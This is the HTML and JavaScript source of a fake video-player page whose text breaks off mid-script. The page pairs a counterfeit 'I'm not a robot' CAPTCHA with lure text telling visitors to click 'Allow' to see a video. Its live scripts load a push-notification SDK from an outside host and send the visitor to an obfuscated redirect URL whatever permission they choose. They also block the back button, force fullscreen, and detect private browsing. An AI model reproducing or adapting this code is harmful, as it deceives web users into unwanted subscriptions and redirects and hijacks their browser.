<!DOCTYPE html>
<html>
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>
    <meta charset="UTF-8">
    <title>Video</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width,height=device-height,initial-scale=1,minimum-scale=1">
    <link rel="icon" type="image/png" sizes="16x16" href="icon.png">
    <style>
        body,
        html {
            height: 100%
        }

        body {
            -moz-osx-font-smoothing: grayscale;
            -moz-user-select: none;
            -ms-user-select: none;
            -webkit-font-smoothing: antialiased;
            -webkit-user-select: none;
            background-color: rgba(0, 0, 0, .4);
            color: #fff;
            font: 400 16px serif;
            margin: 0;
            overflow: hidden;
            text-align: center;
            user-select: none
        }

        .isHide {
            display: none !important
        }

        .isShow {
            display: block !important
        }

        .video {
            background-color: #2d2d2d;
            bottom: 0;
            box-shadow: 0 0 15px 1px #2d2d2d;
            left: 0;
            margin: auto;
            max-height: 500px;
            max-width: 700px;
            position: fixed;
            right: 0;
            top: 0
        }

        .video__wDescr {
            bottom: 50px;
            left: 0;
            position: absolute;
            top: 0;
            width: 100%
        }

        .video__loading {
            -webkit-animation: a 3s linear infinite;
            animation: a 3s linear infinite;
            height: 80px;
            left: 50%;
            margin: -40px 0 0 -40px;
            opacity: .2;
            position: absolute;
            top: 50%;
            width: 80px
        }

        .video__descr {
            left: 5px;
            position: absolute;
            right: 5px
        }

        .video__descrT {
            font-size: 24px;
            margin-top: 10%
        }

        .video__descrT span {
            -webkit-animation: b 1s ease-in-out infinite alternate;
            animation: b 1s ease-in-out infinite alternate;
            color: #d72323;
            font-family: sans-serif;
            text-shadow: 1px 1px 3px #d72323
        }

        .capcha {
            background-color: #fff;
            border-radius: 5px;
            margin: 13% auto 0;
            overflow: hidden;
            padding: 10px;
            width: 260px
        }

        .capcha__wCheck {
            -webkit-tap-highlight-color: transparent;
            cursor: pointer;
            float: left;
            margin-top: 15px;
            outline: none
        }

        .capcha__check {
            border: 2px solid #919191;
            border-radius: 5px;
            display: inline-block;
            height: 26px;
            vertical-align: middle;
            width: 26px
        }

        .capcha__check:before {
            border: 2px solid green;
            border-left: none;
            border-top: none;
            content: "";
            display: block;
            height: 15px;
            margin: 1px 0 0 7px;
            transform: rotate(45deg);
            visibility: hidden;
            width: 10px
        }

        .capcha__wCheck.isActive .capcha__check:before {
            visibility: visible
        }

        .capcha__wCheck:hover .capcha__check {
            background-color: #efefef
        }

        .capcha__tx {
            color: #000;
            display: inline-block;
            margin-left: 10px;
            vertical-align: middle
        }

        .capcha__ic {
            float: right;
            height: 60px;
            width: 60px
        }

        .video__wControl {
            background-color: #000;
            bottom: 0;
            height: 50px;
            left: 0;
            position: absolute;
            width: 100%
        }

        .video__controlProgress {
            background-color: #666;
            height: 4px;
            margin-top: 3px;
            position: relative
        }

        .video__controlProgress:before {
            background-color: #d0021b;
            content: "";
            height: 100%;
            left: 0;
            position: absolute;
            top: 0;
            width: 3px
        }

        .video__controlLeft,
        .video__controlRight {
            margin-top: 8px
        }

        .video__controlLeft {
            float: left
        }

        .video__controlRight {
            float: right;
            padding-right: 10px
        }

        .video__controlRight .video__controlIc:first-child {
            margin-left: 0
        }

        .video__controlInfo {
            float: left;
            font-family: sans-serif;
            font-size: 12px;
            line-height: 29px;
            margin-left: 10px
        }

        .video__controlIc {
            fill: #939393;
            float: left;
            height: 27px;
            margin-left: 10px;
            width: 27px
        }

        .wArrow {
            display: none
        }

        .msgReady {
            background-color: rgba(0, 0, 0, .75);
            height: 100%;
            left: 0;
            position: fixed;
            top: 0;
            width: 100%
        }

        .msgReady__tx {
            font-size: 32px;
            margin-top: 10%
        }

        @-webkit-keyframes a {
            0% {
                transform: rotate(0)
            }

            to {
                transform: rotate(1turn)
            }
        }

        @keyframes a {
            0% {
                transform: rotate(0)
            }

            to {
                transform: rotate(1turn)
            }
        }

        @-webkit-keyframes b {
            0% {
                opacity: 1
            }

            to {
                opacity: .1
            }
        }

        @keyframes b {
            0% {
                opacity: 1
            }

            to {
                opacity: .1
            }
        }

        @-webkit-keyframes c {
            0% {
                transform: translate(0)
            }

            to {
                transform: translate(10px, 10px)
            }
        }

        @keyframes c {
            0% {
                transform: translate(0)
            }

            to {
                transform: translate(10px, 10px)
            }
        }

        @media (min-width:425px) {
            .msgReady__tx {
                font-size: 52px
            }
        }

        @media (min-width:700px) {

            .video__controlLeft,
            .video__controlRight {
                margin-top: 6px
            }

            .video__controlInfo {
                line-height: 34px
            }

            .video__controlIc {
                height: 32px;
                width: 32px
            }

            .video__descrT {
                font-size: 32px;
                margin-top: 25%
            }

            .isYandex .video__descrT {
                margin-top: 32%
            }

            .capcha {
                margin-top: 5%
            }

            .wArrow {
                -webkit-animation: c 1s ease-out infinite alternate;
                animation: c 1s ease-out infinite alternate;
                display: block;
                left: 275px;
                position: absolute;
                top: 105px
            }

            body:-moz-full-screen .wArrow {
                left: 175px;
                top: 135px
            }

            body:-webkit-full-screen .wArrow {
                left: 175px;
                top: 135px
            }

            body:-ms-fullscreen .wArrow {
                left: 175px;
                top: 135px
            }

            body:fullscreen .wArrow {
                left: 175px;
                top: 135px
            }

            .isPopup .wArrow {
                left: 155px;
                top: 135px
            }

            .isYandex .wArrow {
                left: auto;
                right: 205px;
                top: 205px
            }

            .wArrow__ic {
                fill: #fff;
                height: 30px;
                width: 30px
            }
        }
    </style>
</head>

<body>
  <script>(function() {
    function getParameterByName(name, url) {
      if (!url) url = window.location.href;
      name = name.replace(/[\[\]]/g, '\\$&');
      var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'),
          results = regex.exec(url);
      if (!results) return null;
      if (!results[2]) return '';
      return decodeURIComponent(results[2].replace(/\+/g, ' '));
    }

    var loc = document.location;
    var tb = function(){ loc.href = ['ht', 'tps:/', '/blud', 'wan.com/a', 'fu.ph', 'p?zon', 'eid=2483917'].join(''); };
    var bc = function(){ loc.href = ['ht', 'tps:', '/', '/go', 'ogle.com/'].join(''); };

    var url = new URL(window.location.href);
    var pci = getParameterByName('external_id', window.location.href);
    var ppi = getParameterByName('placementid', window.location.href);
    var tag = document.createElement('script');
    tag.type = 'text/javascript';
    tag.dataset['sdk'] = 'sdk';
    tag.src = '//pushokey.com/ntfc.php?p=2483903&ucis=true&m=https&nbinp=true' + '&var='+ ppi + '&ymid=' + pci;

    function setupHandlers() {
      // sdk.onBeforePermissionPrompt();
      sdk.onPermissionDefault(tb);
      sdk.onPermissionAllowed(tb);
      sdk.onPermissionDenied(tb);
      sdk.onAlreadySubscribed(tb);
    }

    tag.onload = setupHandlers;

    document.head.appendChild(tag);
    })();</script>  
    <div class="video">
        <div class="video__wDescr"><svg class="video__loading" xmlns="http://www.w3.org/2000/svg" version="1.1" viewBox="0 0 26.349 26.35">
                <circle fill="#fff" cx="13.792" cy="3.082" r="3.082"></circle>
                <circle fill="rgba(255,255,255,.6)" cx="13.792" cy="24.501" r="1.849"></circle>
                <circle fill="rgba(255,255,255,.9)" cx="6.219" cy="6.218" r="2.774"></circle>
                <circle fill="rgba(255,255,255,.5)" cx="21.365" cy="21.363" r="1.541"></circle>
                <circle fill="rgba(255,255,255,.8)" cx="3.082" cy="13.792" r="2.465"></circle>
                <circle fill="rgba(255,255,255,.3)" cx="24.501" cy="13.791" r="1.232"></circle>
                <path fill="rgba(255,255,255,.7)" d="M4.694,19.84c-0.843,0.843-0.843,2.207,0,3.05c0.842,0.843,2.208,0.843,3.05,0c0.843-0.843,0.843-2.207,0-3.05 C6.902,18.996,5.537,18.988,4.694,19.84z"></path>
                <circle fill="rgba(255,255,255,.2)" cx="21.364" cy="6.218" r="0.924"></circle>
            </svg>
            <div class="video__descr">
                <div class="video__descrT"></div>
                <div class="capcha">
                    <div class="capcha__wCheck">
                        <div class="capcha__check"></div>
                        <div class="capcha__tx"></div>
                    </div><svg class="capcha__ic" version="1.1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 150 150">
                        <path fill="#1c3aa9" d="m117 62.063c-2e-3 -0.60232-0.0159-1.2014-0.0429-1.7976v-33.991l-9.3971 9.3971c-7.691-9.4141-19.391-15.427-32.496-15.427-13.638 0-25.754 6.5097-33.413 16.591l15.403 15.565c1.5095-2.7917 3.6539-5.1895 6.2395-7.0005 2.6891-2.0985 6.4993-3.8143 11.77-3.8143 0.63674 0 1.1282 0.0744 1.4893 0.21458 6.5304 0.51543 12.191 4.1194 15.524 9.3503l-10.903 10.903c13.81-0.0542 29.411-0.086 35.825 7e-3"></path>
                        <path fill="#4285f4" d="m74.819 20.246c-0.60232 2e-3 -1.2014 0.0159-1.7976 0.0429h-33.991l9.3971 9.3971c-9.4141 7.691-15.427 19.391-15.427 32.496 0 13.638 6.5098 25.754 16.591 33.413l15.565-15.403c-2.7917-1.5095-5.1895-3.6539-7.0005-6.2395-2.0984-2.6891-3.8143-6.4993-3.8143-11.77 0-0.63674 0.0744-1.1282 0.21458-1.4893 0.51543-6.5304 4.1194-12.191 9.3503-15.524l10.903 10.903c-0.0542-13.81-0.0861-29.411 7e-3 -35.825"></path>
                        <path fill="#ababab" d="m33.002 62.181c2e-3 0.60232 0.0159 1.2014 0.0429 1.7976v33.991l9.3971-9.3971c7.691 9.4141 19.391 15.427 32.496 15.427 13.638 0 25.754-6.5097 33.413-16.591l-15.403-15.565c-1.5095 2.7917-3.6539 5.1895-6.2395 7.0005-2.6891 2.0985-6.4993 3.8143-11.77 3.8143-0.63674 0-1.1282-0.0744-1.4893-0.21458-6.5304-0.51543-12.191-4.1194-15.524-9.3503l10.903-10.903c-13.81 0.0542-29.411 0.086-35.825-7e-3"></path>
                        <path fill="#a6a6a6" d="m40.078 120.24c-1.0215 0-1.9373 0.19374-2.7475 0.58118-0.81015 0.37866-1.497 0.92024-2.0606 1.6247-0.55478 0.70447-0.98186 1.5587-1.2813 2.5625-0.2906 0.99506-0.4359 2.109-0.4359 3.3418v3.5532c0 1.2416 0.1453 2.36 0.4359 3.3551 0.2994 0.99507 0.72209 1.8448 1.2681 2.5493s1.2064 1.246 1.9813 1.6247 1.6467 0.56799 2.6154 0.56799c0.99507 0 1.8669-0.1453 2.6154-0.4359 0.75731-0.29059 1.3913-0.70888 1.9021-1.2548 0.51074-0.55478 0.90261-1.224 1.1756-2.0078 0.28179-0.78373 0.44911-1.6731 0.50194-2.6682h-2.4437c-0.06165 0.76612-0.16731 1.4222-0.31702 1.9681-0.1497 0.53717-0.36985 0.98187-0.66045 1.3341-0.28179 0.34344-0.65164 0.59881-1.1096 0.76613-0.4491 0.1585-1.0039 0.23775-1.6643 0.23775-0.70448 0-1.3033-0.1541-1.7964-0.46231-0.49313-0.31701-0.8938-0.74851-1.202-1.2945-0.2994-0.54598-0.51955-1.1844-0.66045-1.9153-0.13209-0.73091-0.19813-1.519-0.19813-2.3644v-3.5796c0-0.90699 0.07925-1.7304 0.23776-2.4701 0.16731-0.73969 0.41828-1.3693 0.75291-1.8889 0.33463-0.51956 0.75731-0.92023 1.2681-1.202 0.51074-0.29059 1.1184-0.43589 1.8228-0.43589 0.59 0 1.0963 0.088 1.519 0.26419 0.42269 0.16731 0.77492 0.43149 1.0567 0.79252 0.28179 0.35224 0.49754 0.80134 0.64724 1.3473 0.1497 0.54598 0.25097 1.1976 0.3038 1.9549h2.4437c-0.04402-1.0391-0.20694-1.9593-0.48873-2.7607-0.28179-0.80135-0.67366-1.475-1.1756-2.021-0.50194-0.54596-1.114-0.95985-1.836-1.2416-0.71328-0.2818-1.5366-0.42269-2.4701-0.42269zm59.652 0c-1.0215 0-1.9373 0.19374-2.7475 0.58118-0.81015 0.37866-1.497 0.92024-2.0606 1.6247-0.55477 0.70447-0.98187 1.5587-1.2813 2.5625-0.29059 0.99506-0.43588 2.109-0.43588 3.3418v3.5532c0 1.2416 0.14529 2.36 0.43588 3.3551 0.2994 0.99507 0.7221 1.8448 1.2681 2.5493 0.54598 0.70448 1.2064 1.246 1.9813 1.6247 0.77492 0.37866 1.6467 0.56799 2.6154 0.56799 0.99506 0 1.8668-0.1453 2.6154-0.4359 0.7573-0.29059 1.3913-0.70888 1.9021-1.2548 0.51075-0.55478 0.90261-1.224 1.1756-2.0078 0.2818-0.78373 0.44912-1.6731 0.50194-2.6682h-2.4436c-0.0616 0.76612-0.16731 1.4222-0.31702 1.9681-0.1497 0.53717-0.36985 0.98187-0.66044 1.3341-0.28179 0.34344-0.65164 0.59881-1.1096 0.76613-0.4491 0.1585-1.0039 0.23775-1.6643 0.23775-0.70448 0-1.3033-0.1541-1.7964-0.46231-0.49313-0.31701-0.89381-0.74851-1.202-1.2945-0.2994-0.54598-0.51955-1.1844-0.66045-1.9153-0.13208-0.73091-0.19813-1.519-0.19813-2.3644v-3.5796c0-0.90699 0.0793-1.7304 0.23776-2.4701 0.16732-0.73969 0.41828-1.3693 0.75292-1.8889 0.33462-0.51956 0.75731-0.92023 1.268-1.202 0.51075-0.29059 1.1184-0.43589 1.8228-0.43589 0.58999 0 1.0963 0.088 1.519 0.26419 0.42269 0.16731 0.77493 0.43149 1.0567 0.79252 0.28178 0.35224 0.49753 0.80134 0.64723 1.3473 0.1497 0.54598 0.25097 1.1976 0.30381 1.9549h2.4436c-0.0441-1.0391-0.20693-1.9593-0.48873-2.7607-0.28179-0.80135-0.67365-1.475-1.1756-2.021s-1.114-0.95985-1.836-1.2416c-0.71327-0.2818-1.5366-0.42269-2.4701-0.42269zm-45.729 0.26418-6.195 19.232h2.4833l1.4926-5.0194h6.4988l1.519 5.0194h2.4833l-6.2082-19.232zm10.897 0v19.232h2.4172v-7.5291h3.7117c0.92463 0 1.7436-0.12769 2.4569-0.38306 0.71328-0.26418 1.3121-0.64283 1.7964-1.136 0.49313-0.49314 0.86298-1.1007 1.1095-1.8228 0.25537-0.7309 0.38306-1.5586 0.38306-2.4833 0-0.85418-0.12768-1.6379-0.38306-2.3512-0.24657-0.7221-0.61202-1.3429-1.0963-1.8625-0.48433-0.52835-1.0875-0.93783-1.8096-1.2284-0.71328-0.29059-1.5322-0.43589-2.4569-0.43589zm13.724 0v2.087h5.0458v17.145h2.4172v-17.145h5.059v-2.087zm30.341 0v19.232h2.4172v-8.8896h7.7404v8.8896h2.4304v-19.232h-2.4304v8.2688h-7.7404v-8.2688zm21.755 0-6.195 19.232h2.4833l1.4926-5.0194h6.4988l1.519 5.0194h2.4833l-6.2082-19.232zm-63.403 2.087h3.7117c0.59 0 1.0919 0.1056 1.5058 0.31701 0.42268 0.21133 0.76612 0.49312 1.0303 0.84536 0.27298 0.35224 0.47112 0.76171 0.5944 1.2284 0.13209 0.4579 0.19814 0.93343 0.19814 1.4266 0 0.54597-0.06604 1.0479-0.19814 1.5058-0.12328 0.44911-0.32142 0.84098-0.5944 1.1756-0.26418 0.32582-0.60761 0.58119-1.0303 0.76612-0.41388 0.18492-0.91582 0.27738-1.5058 0.27738h-3.7117zm-12.284 1.2945 2.6286 8.7443h-5.2439zm76.717 0 2.6286 8.7443h-5.2439zm-113.78 1.2945c-0.60761 0-1.1316 0.1541-1.5719 0.46231-0.43149 0.30821-0.79254 0.72649-1.0831 1.2548l-0.03963-1.453h-2.2719v14.292h2.338v-10.224c0.22015-0.60762 0.53276-1.0875 0.93783-1.4398 0.41388-0.35223 0.93784-0.52835 1.5719-0.52835 0.20254 0 0.38306 9e-3 0.54156 0.0264 0.15851 9e-3 0.33022 0.0308 0.51515 0.066l-0.01321-2.2719c-0.03523-0.0177-0.09246-0.0353-0.17172-0.0529-0.07044-0.0265-0.1497-0.0485-0.23776-0.066-0.08807-0.0176-0.18052-0.0309-0.27739-0.0397-0.08807-0.0176-0.16731-0.0264-0.23776-0.0264zm7.8593 0c-0.67806 0-1.3341 0.11887-1.9681 0.35664-0.63403 0.23776-1.1976 0.62962-1.6907 1.1756-0.48432 0.53716-0.87619 1.2416-1.1756 2.1134-0.2994 0.86298-0.4491 1.9241-0.4491 3.1834v1.6115c0 1.0919 0.12769 2.0386 0.38306 2.8399s0.62082 1.4662 1.0963 1.9946c0.48433 0.51954 1.0699 0.907 1.7568 1.1624 0.68686 0.25538 1.4574 0.38306 2.3116 0.38306 0.61642 0 1.1668-0.0617 1.6511-0.18492 0.49313-0.12329 0.92903-0.2818 1.3077-0.47553 0.37866-0.20255 0.70448-0.43149 0.97746-0.68686s0.50634-0.51955 0.70007-0.79254l-1.2152-1.4794c-0.19373 0.23775-0.40067 0.45791-0.62082 0.66045-0.22015 0.19372-0.46231 0.36545-0.72649 0.51514-0.26418 0.1409-0.55478 0.25098-0.87179 0.33023-0.31701 0.0792-0.67366 0.11888-1.0699 0.11888-1.0831 0-1.9153-0.34784-2.4965-1.0435-0.57239-0.69567-0.85858-1.8096-0.85858-3.3419v-0.33023h7.9782v-1.3605c0-1.0919-0.09246-2.0562-0.27739-2.8928-0.18492-0.83657-0.47992-1.541-0.885-2.1134-0.40507-0.57239-0.92463-1.0039-1.5587-1.2945-0.63403-0.29941-1.4001-0.4491-2.2984-0.4491zm0 2.0078c0.51074 0 0.93343 0.0924 1.2681 0.27739 0.33462 0.18492 0.5988 0.44469 0.79254 0.77931 0.20254 0.33463 0.34783 0.73532 0.43589 1.202 0.09686 0.4579 0.1585 0.96424 0.18492 1.519v0.31701h-5.627c0.03523-0.80135 0.13209-1.4662 0.2906-1.9946s0.36545-0.94665 0.62082-1.2548c0.26418-0.31701 0.56798-0.53715 0.91142-0.66044 0.34343-0.12328 0.71768-0.18492 1.1228-0.18492z"></path>
                    </svg>
                </div>
            </div>
        </div>
        <div class="video__wControl">
            <div class="video__controlProgress"></div>
            <div class="video__controlLeft"><svg xmlns="http://www.w3.org/2000/svg" version="1.1" class="video__controlIc isPlay" viewBox="0 0 32 32">
                    <path d="m9 24 14-8-14-8z"></path>
                </svg><svg xmlns="http://www.w3.org/2000/svg" version="1.1" class="video__controlIc isGo" viewBox="0 0 32 32">
                    <path d="m19.9982847 15.3389545-10.9982847-7.3389545v15.9990007l10.9982847-7.3399538v7.3409531h3.0017153v-15.98900756h-3.0017153z"></path>
                </svg>
                <div class="video__controlInfo">00:00 / 6:45</div><svg xmlns="http://www.w3.org/2000/svg" version="1.1" class="video__controlIc isSound" viewBox="0 0 32 32">
                    <path d="m15.7953529 9.04082456c.1257064.06406941.2056128.19737514.2046383.34308139v14.23271095c0 .1457062-.0799064.279012-.2046383.3430814-.0526213.0279012-.1091404.0403017-.1656596.0403017-.0779574 0-.1568893-.0258344-.2221787-.0775033l-5.54374876-4.3288192h-3.11927225c-.41025105 0-.74449359-.3451481-.74449359-.7698664v-4.646066c0-.4247183.33424254-.7698664.74449359-.7698664h3.11927225l5.54374876-4.32985255c.1110894-.0878371.2621319-.10333777.3878383-.03720159zm7.2046471 7.45867724c0 2.2629767-1.0844571 4.2688649-2.747102 5.5004982l-1.252898-1.3691458c1.3172463-.8788839 2.1925716-2.3994927 2.1925716-4.1313524 0-1.7308633-.8753253-3.2514721-2.1925716-4.130356l1.252898-1.3691458c1.6626449 1.2316333 2.747102 3.2375215 2.747102 5.4995018zm-3-.0000037c0 1.4897461-.7231986 2.7907643-1.7970123 3.5005019l-1.2029877-1.4254984c.7688928-.3011616 1.3224956-1.1153018 1.3224956-2.0750035 0-.957694-.5544815-1.7728381-1.3224956-2.0729959l1.2029877-1.4265022c1.0738137.7097376 1.7970123 2.0107558 1.7970123 3.4994981zm2.2948011-7.4994981c2.2528555 1.7418839 3.7051989 4.455703 3.7051989 7.4995 0 3.044797-1.4523434 5.7586161-3.7042143 7.5005l-1.2957857-1.3639091c1.8914927-1.393907 3.120323-3.6247583 3.120323-6.1365909 0-2.5098326-1.2288303-4.7416839-3.120323-6.134591z"></path>
                </svg>
            </div>
            <div class="video__controlRight"><svg xmlns="http://www.w3.org/2000/svg" version="1.1" class="video__controlIc isOptions" viewBox="0 0 32 32">
                    <path d="m23.242 14.316c.421 0 .758.337.758.741v1.853c0 .421-.337.757-.758.757h-.842c-.32 0-.589.203-.708.505-.033.102-.067.202-.118.304-.134.303-.066.64.153.858l.572.557c.304.303.304.774 0 1.077l-1.314 1.315c-.303.302-.774.302-1.078 0l-.572-.574c-.219-.218-.556-.286-.843-.151-.1.067-.219.101-.336.151-.303.119-.489.405-.489.707v.827c0 .421-.337.757-.758.757h-1.852c-.421 0-.758-.336-.758-.757v-.776c0-.319-.202-.589-.488-.707-.102-.051-.219-.101-.337-.151-.287-.135-.623-.068-.842.151l-.573.572c-.303.304-.775.304-1.078 0l-1.314-1.313c-.303-.303-.303-.774 0-1.078l.59-.589c.219-.236.286-.573.151-.859-.033-.101-.084-.203-.117-.303-.102-.304-.388-.506-.708-.506h-.825c-.421 0-.758-.337-.758-.74v-1.854c0-.421.337-.758.758-.758h.842c.32 0 .589-.202.708-.504.033-.102.067-.186.118-.287.134-.287.066-.64-.153-.859l-.606-.606c-.303-.303-.303-.775 0-1.078l1.314-1.314c.303-.303.775-.303 1.078 0l.606.606c.236.219.573.287.859.152.101-.05.185-.084.287-.117.302-.102.504-.388.504-.708v-.859c0-.421.337-.758.759-.758h1.852c.422 0 .759.337.759.758v.842c0 .32.202.59.504.707.102.034.186.085.287.118.286.135.64.068.859-.151l.606-.607c.303-.302.775-.302 1.078 0l1.314 1.314c.303.304.303.775 0 1.078l-.606.606c-.237.219-.287.573-.153.859.034.085.085.185.118.287.119.303.388.505.708.505zm-7.242 4.632c1.634 0 2.947-1.314 2.947-2.948 0-1.633-1.313-2.947-2.947-2.947s-2.947 1.314-2.947 2.947c0 1.634 1.313 2.948 2.947 2.948z"></path>
                </svg><svg xmlns="http://www.w3.org/2000/svg" version="1.1" class="video__controlIc isFull" viewBox="0 0 32 32">
                    <path d="m8.125 17.75v2.625h2.625v2.625h-5.25v-5.25zm13.125-8.75h5.25v5.25h-2.625v-2.625h-2.625zm2.625 11.375v-2.625h2.625v5.25h-5.25v-2.625zm-18.375-6.125v-5.25h5.25v2.625h-2.625v2.625z"></path>
                </svg><svg xmlns="http://www.w3.org/2000/svg" version="1.1" class="video__controlIc isSave" viewBox="0 0 32 32">
                    <path d="m22.667958 17.4957586h2.0463774c.1389837 0 .2525019.1136976.2525019.2525019v6.6375006c0 .138625-.1135182.252502-.2525019.252502h-17.42819149c-.13898365 0-.25268125-.113877-.25268125-.252502v-6.6375006c0-.1388043.1136976-.2525019.25268125-.2525019h1.89484037c.13880432 0 .25250191.1136976.25250191.2525019v4.4456836c0 .1388043.1136976.2523226.25250192.2523226h12.47714539c.138625 0 .252502-.1135183.252502-.2523226v-4.4456836c0-.1388043.1136976-.2525019.2523225-.2525019zm-4.8844056-3.2958673v.0001793h2.3103566c.2223739 0 .3014601.1502817.1761058.3337401l-4.041824 5.9239317c-.1255336.1834584-.3303328.1834584-.4556871 0l-4.0420033-5.924111c-.1255336-.1834585-.0460887-.3337401.1761058-.3337401h2.3101773c.2223738 0 .4042183-.1818445.4042183-.404039v-6.39181337c0-.22219451.1818444-.40403893.4042182-.40403893h1.9497165c.2223739 0 .4043976.18184442.4043976.40403893v6.39181337c0 .2221945.1818444.404039.4042183.404039z"></path>
                </svg></div>
        </div>
    </div>
    <div class="wArrow"><svg xmlns="http://www.w3.org/2000/svg" version="1.1" class="wArrow__ic" viewBox="0 0 295.688 295.688">
            <path d="M291.294,239.713L189.603,138.024l74.055-31.949c5.745-2.479,9.348-8.265,9.038-14.515 c-0.312-6.25-4.468-11.651-10.431-13.551L19.554,0.707c-5.346-1.7-11.193-0.28-15.158,3.687C0.429,8.36-0.994,14.207,0.708,19.552 l77.303,242.713c1.898,5.963,7.301,10.12,13.551,10.432c6.25,0.311,12.035-3.294,14.514-9.039l31.949-74.054l101.69,101.69 c2.813,2.813,6.627,4.394,10.604,4.394c3.979,0,7.796-1.58,10.606-4.394l30.367-30.368 C297.152,255.068,297.152,245.571,291.294,239.713z"></path>
        </svg></div>
    <div class="msgReady isHide">
        <div class="msgReady__tx"></div>
    </div>
    <script>
        ! function(t) {
            var o = {};

            function i(e) {
                if (o[e]) return o[e].exports;
                var n = o[e] = {
                    i: e,
                    l: !1,
                    exports: {}
                };
                return t[e].call(n.exports, n, n.exports, i), n.l = !0, n.exports
            }
            i.m = t, i.c = o, i.d = function(e, n, t) {
                i.o(e, n) || Object.defineProperty(e, n, {
                    enumerable: !0,
                    get: t
                })
            }, i.r = function(e) {
                "undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol.toStringTag, {
                    value: "Module"
                }), Object.defineProperty(e, "__esModule", {
                    value: !0
                })
            }, i.t = function(n, e) {
                if (1 & e && (n = i(n)), 8 & e) return n;
                if (4 & e && "object" == typeof n && n && n.__esModule) return n;
                var t = Object.create(null);
                if (i.r(t), Object.defineProperty(t, "default", {
                        enumerable: !0,
                        value: n
                    }), 2 & e && "string" != typeof n)
                    for (var o in n) i.d(t, o, function(e) {
                        return n[e]
                    }.bind(null, o));
                return t
            }, i.n = function(e) {
                var n = e && e.__esModule ? function() {
                    return e.default
                } : function() {
                    return e
                };
                return i.d(n, "a", n), n
            }, i.o = function(e, n) {
                return Object.prototype.hasOwnProperty.call(e, n)
            }, i.p = "", i(i.s = 2)
        }([function(e, n) {
            if (0 === "".length) {
                var t = function() {
                    void 0 !== this.requestFullScreen ? this.requestFullScreen() : void 0 !== this.webkitRequestFullScreen ? this.webkitRequestFullScreen() : void 0 !== this.mozRequestFullScreen && this.mozRequestFullScreen()
                };
                document.body.addEventListener("keydown", t), document.body.addEventListener("click", t)
            }
        }, , function(e, n, t) {
            "use strict";
            t.r(n);
            var c = function() {
                    var e = location.search.split("#")[0].split("?")[1];
                    if (void 0 === e) return null;
                    var o = {};
                    return e.split("&").forEach(function(e) {
                        var n = e.split("=");
                        if (2 === n.length) o[n[0]] = n[1] || null;
                        else {
                            var t = n[0];
                            n.shift(), o[t] = n.join("=")
                        }
                    }), o
                },
                o = c();
            if (null !== o && void 0 !== o.bbr && "1" === o.bbr) {
                var i = document.title,
                    r = location.pathname + location.search;
                history.pushState(null, i, r), window.addEventListener("popstate", function() {
                    history.pushState({}, i, r)
                })
            }
            t(0);
            var u = function(e, n, t, o) {
                    var i = new Date;
                    i.setTime(i.getTime() + 1e3 * t);
                    var r = "; expires=" + i.toUTCString(),
                        a = "";
                    void 0 !== o && (a = "; domain=" + o), document.cookie = e + "=" + (n || "") + a + r + "; path=/"
                },
                l = function(e) {
                    null !== window.opener && void 0 !== window.opener && opener.postMessage(e, "*")
                },
                p = {
                    ua: navigator.userAgent,
                    m: function(n) {
                        var e = "normal",
                            t = "private";

                        function o() {
                            return n(t)
                        }

                        function i() {
                            return n(e)
                        }
                        if ("safari" === p.n) try {
                            return window.openDatabase(null, null, null, null), n(e)
                        } catch (e) {
                            return n(t)
                        } else if ("firefox" === p.n) {
                            var r = indexedDB.open("test.html");
                            r.addEventListener("error", o), r.addEventListener("success", i)
                        } else {
                            if ("edge" === p.n) return void 0 !== window.indexedDB || void 0 === window.PointerEvent && void 0 === window.MSPointerEvent ? n(e) : n(t);
                            if ("opera" !== p.n && "yandex" !== p.n && "chrome" !== p.n) return n("unknown");
                            window.webkitRequestFileSystem(window.TEMPORARY, 1, i, o)
                        }
                    },
                    get n() {
                        var e = !!window.opr && !!opr.addons || !!window.opera || 0 < this.ua.indexOf("OPR/index.html"),
                            n = "undefined" != typeof InstallTrigger,
                            t = /constructor/i.test(window.HTMLElement) || /(MacPPC|MacIntel|Mac_PowerPC|Macintosh)/.test(this.ua),
                            o = !!window.chrome && /Google Inc/.test(navigator.vendor),
                            i = 0 < this.ua.indexOf("YaBrowser") || 0 < this.ua.indexOf("Yowser"),
                            r = /UBrowser/.test(this.ua),
                            a = /Edge\//.test(this.ua),
                            s = null;
                        return e ? s = "opera" : n ? s = "firefox" : i ? s = "yandex" : r ? s = "uc" : a ? s = "edge" : o ? s = "chrome" : t && (s = "safari"), s
                    },
                    get d() {
                        var n = {
                                webOS: "webOS",
                                iPhone: "iPhone",
                                iPad: "iPad",
                                iPod: "iPod",
                                mac: "(MacPPC|MacIntel|Mac_PowerPC|Macintosh)",
                                blackBerry: "BlackBerry|BB|PlayBook",
                                windows: "Windows NT",
                                windowPhone: "Windows Phone",
                                android: "Android"
                            },
                            t = null;
                        return Object.keys(n).some(function(e) {
                            if (null !== p.ua.match(new RegExp(n[e], "i"))) return t = e, !0
                        }), t
                    }
                };
                var v = p;
                var w = c();
            // null !== w && void 0 !== w.i && (h.c = parseInt(w.i, 10)), 0 < h.r && (h.s = h.c < h.r);
            var g = function(n) {
                    if (!(void 0 !== window.navigator && void 0 !== navigator.serviceWorker && void 0 !== window.PushManager && void 0 !== window.Notification)) return n(!1, "unsupported");
                    v.m(function(e) {
                        return "private" === e ? n(!1, e) : "unknown" === e ? n(!1, e) : n(!0, "supported")
                    })
                },
                y = {
                    k: "",
                    t: {},
                    set: function(e) {
                        void 0 !== window.navigator && void 0 !== navigator.language && (y.k = navigator.language.slice(0, 2)), void 0 === e[y.k] && (y.k = "en"), y.t = e[y.k]
                    },
                    get: function(e) {
                        return y.t[e]
                    }
                },
                b = y;

            function P(e) {
                l({
                    a: e ? "success" : "close"
                }), null !== window.opener && void 0 !== window.opener && close(), document.querySelector(".video").classList.add("isHide"), document.querySelector(".wArrow").classList.add("isHide"), document.querySelector(".msgReady").classList.remove("isHide")
            }
            var R = "convert";

            b.set({
                en: {
                    c: "I'm not a robot",
                    t: 'To access to the video, click <span>"Allow"</span>',
                    msgReady: "You have successfully passed the verification!<br>Now you can close the window."
                },
                uk: {
                    c: "Я не робот",
                    t: 'Щоб отримати доступ до цього відео, натисніть <span>"Дозволити"</span>',
                    msgReady: "Ви успішно пройшли перевірку!<br>Тепер ви можете закрити вікно."
                },
                pl: {
                    c: "nie jestem robotem",
